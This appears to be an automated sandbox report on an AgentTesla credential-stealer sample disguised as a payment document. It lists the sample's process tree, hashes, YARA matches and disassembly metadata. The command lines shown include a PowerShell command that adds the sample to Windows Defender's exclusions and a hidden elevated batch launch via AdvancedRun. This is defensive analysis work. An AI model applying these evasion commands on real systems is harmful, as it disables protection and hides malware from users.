                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        Analysis Process: Zahlungskopie.exe PID: 984 Parent PID: 5952

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:08:46
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\Zahlungskopie.exe'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: AdvancedRun.exe PID: 6584 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:07
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:91000 bytes
                                                                                                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: AdvancedRun.exe PID: 6712 Parent PID: 6584

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:09
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:91000 bytes
                                                                                                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: powershell.exe PID: 6856 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:14
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
                                                                                                                                                                                                                        Imagebase:0x1050000
                                                                                                                                                                                                                        File size:430592 bytes
                                                                                                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6868 Parent PID: 6856

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:14
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: powershell.exe PID: 6884 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:15
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
                                                                                                                                                                                                                        Imagebase:0x1050000
                                                                                                                                                                                                                        File size:430592 bytes
                                                                                                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6936 Parent PID: 6884

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:15
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: Zahlungskopie.exe PID: 5780 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:22
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x200000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: Zahlungskopie.exe PID: 3660 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:22
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Analysis Process: Zahlungskopie.exe PID: 6448 Parent PID: 984

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:23
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Analysis Process: Zahlungskopie.exe PID: 984 Parent PID: 5952 Zahlungskopie.exeCOMMON

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 015DAD90, Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ac4d345a69764c11128b2a6fde0d724a1cbcb0a82c57381aa17dbdbef712148a
                                                                                                                                                                                                                          • Instruction ID: 3d28a1b3d3580e25aefb7c3d06eba5592d7fa73e843ecacbfdd04517048d4575
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac4d345a69764c11128b2a6fde0d724a1cbcb0a82c57381aa17dbdbef712148a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 855144B49002498FDB24CFA9D588BDEBBF0FF88314F208559E409AB760DB749944CF65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D8AA8, Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 015D8CEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          • Opcode ID: 1617afc620366c01dffcb6d7bbc3e9e2d48e8fb206e766071aa56bec95717ff0
                                                                                                                                                                                                                          • Instruction ID: ccdd4c44309711c045f160c5fd8cf43de26ff3b0c9265dd5a60abde0bcd9301c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1617afc620366c01dffcb6d7bbc3e9e2d48e8fb206e766071aa56bec95717ff0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E7104B0A00B058FE724DF29D5557AABBF1BF88204F10892AD58ADBB50DB74E8458F91
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DF25B, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DF3CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          • Opcode ID: daca5aab983c20d27e2d8839d63a8264ac9155d83a8a2e3f1af8e39d63f6aeba
                                                                                                                                                                                                                          • Instruction ID: de7241d02edaea1e88e4f23bf574e67fe3490527046b8436d55387d4c3489dc3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daca5aab983c20d27e2d8839d63a8264ac9155d83a8a2e3f1af8e39d63f6aeba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F96102B6C00249EFDF11CFA9D980ADDBFB5BF48314F25816AE819AB220D7759846CF50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DD0C4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DF3CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          • Opcode ID: 60d9be5979857ecefa3adba6a6bea9cb66f2d3229e6330bd89cf4f88ed749b36
                                                                                                                                                                                                                          • Instruction ID: e91dcb343a63e4c848aea63454e816ef30c25f0f597387e3433378ef12b4c80e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d9be5979857ecefa3adba6a6bea9cb66f2d3229e6330bd89cf4f88ed749b36
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851C2B1D00349DFDB14CF99D884ADEBBB5FF48314F64862AE819AB210D7749945CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D752B, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: 63f3805db07b9205a409ef085c498e68ab88e515a01d5a17c75034e12046a2ad
                                                                                                                                                                                                                          • Instruction ID: 643c7d8139cc09bb97d271e54a1e72bca86a3b98b558ec647ec88f6a9c39161b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63f3805db07b9205a409ef085c498e68ab88e515a01d5a17c75034e12046a2ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B31FD709103858FEB20DFADE1083EA7FF4BB09309F04446DE459EB281E7389548DBA2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DB3B8, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DB386,?,?,?,?,?), ref: 015DB447
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: a0adb6da317d56e7423e2faf737ceadbba94af7a29601e44d53d3614feccc085
                                                                                                                                                                                                                          • Instruction ID: c4fe124671fe8d3c95e7cf1b7b5f987bf70ef2cd88742f02a0f9c3742c46fe61
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0adb6da317d56e7423e2faf737ceadbba94af7a29601e44d53d3614feccc085
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F22105B5900248DFDB10CFAAD584ADEBBF9FB48320F15841AE914A7710D774A954CF61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D980C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DB386,?,?,?,?,?), ref: 015DB447
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: ce62b87057adc09cdd7b6e18963acaf90d42c4b1b7f108bc789c953479b97b20
                                                                                                                                                                                                                          • Instruction ID: 9b65f1e96553d2dec32ee1118e3da6e1fbd0ea7e16158caecb8d5667167f408f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce62b87057adc09cdd7b6e18963acaf90d42c4b1b7f108bc789c953479b97b20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A2103B59002489FDB10CFAAD584BEEBBF5FB48320F14841AE918B7310D374A954CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D7E28, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015D8D69,00000800,00000000,00000000), ref: 015D8F7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: b0560b0ba4e345c05663716006e0208cd5696fa374430b6ea978e4928dfe1c8c
                                                                                                                                                                                                                          • Instruction ID: 572d4582503a0704e2ae35dc1038733750b15049938989ba6e72f6d9e789270c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0560b0ba4e345c05663716006e0208cd5696fa374430b6ea978e4928dfe1c8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321136B69002099FDB20CF9AD444BDEFBF5EB88310F50845AE529B7700C374A545CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D8F0B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015D8D69,00000800,00000000,00000000), ref: 015D8F7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: c024800675132f3ce0734d118fc4316a0cba676c7480d523d2b323f0ce10260e
                                                                                                                                                                                                                          • Instruction ID: ac1e3b5dc97e317b989b792d8b2ae331e51b67a26c6c7a2952fe6d60dced4a31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c024800675132f3ce0734d118fc4316a0cba676c7480d523d2b323f0ce10260e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D1114B69002499FDB10CF9AD884BDEFBF5EB48324F14845AE529B7700C774A545CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D7598, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: 5d39ea9edff72d5a222fe576b6115427362f304e1282675c27943b7157700642
                                                                                                                                                                                                                          • Instruction ID: df9bcef9c16b2cb1feb8568f31c5b5f0bd4963eda4b0bb153a4b9a356edada1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d39ea9edff72d5a222fe576b6115427362f304e1282675c27943b7157700642
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811AC75810389CEDB20CF99D0453EABFF4FB09314F10856ED455AB241D7789648CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D75A8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: 97803a55e3308935b250261c9d3cab1563cc5db9d58969b0b9286a546b468346
                                                                                                                                                                                                                          • Instruction ID: 4b5d3f18175c826cef56170685f8668184a7b1295f1ae16f5204374698b09587
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97803a55e3308935b250261c9d3cab1563cc5db9d58969b0b9286a546b468346
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71119A758143898EDB20CF99D1057EEBFF8FB09318F14845DD496BB641D778A608CBA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015D8C88, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 015D8CEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          • Opcode ID: 0341e6d0d56f25e47afe66015b8bca3b60d081ed16cfa34c81c93ffb8229860e
                                                                                                                                                                                                                          • Instruction ID: 10ea45a4c534c46bd4fc16ce8ba8082ac9c0049eed20eb5fac9d1a8edee2b8d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0341e6d0d56f25e47afe66015b8bca3b60d081ed16cfa34c81c93ffb8229860e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE11E0B6C002498FDB20CF9AD544BDEFBF4AB88324F14851AD819BB710D778A545CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DD0FC, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015DF4E8,?,?,?,?), ref: 015DF55D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                          • Opcode ID: e3e4d817191e9e04e39b01e618aa8172c51a90b20da53adeda2bc9ad3d07c990
                                                                                                                                                                                                                          • Instruction ID: 064793b2ecb4def8151e30053f8204f6fc3a2183e795735a8eae3d768e4dee00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3e4d817191e9e04e39b01e618aa8172c51a90b20da53adeda2bc9ad3d07c990
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6211F2B58002499FDB20CF99D585BDEBBF8EB48324F60851AE919B7700D374AA44CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DF4F8, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015DF4E8,?,?,?,?), ref: 015DF55D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                          • Opcode ID: 6e3560b2e22b7a0685c4676fe1e06387e791061030f1698028218ee04c382842
                                                                                                                                                                                                                          • Instruction ID: 2d4bebc6d410cd4f85ade0a02c8d876e72db00d3732d5f8a267d3200b0a84136
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3560b2e22b7a0685c4676fe1e06387e791061030f1698028218ee04c382842
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C11F2B58002499FDB20DF99D585BDEBBF8EB48324F20841AE819B7700D774AA44CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 015DDB40, Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
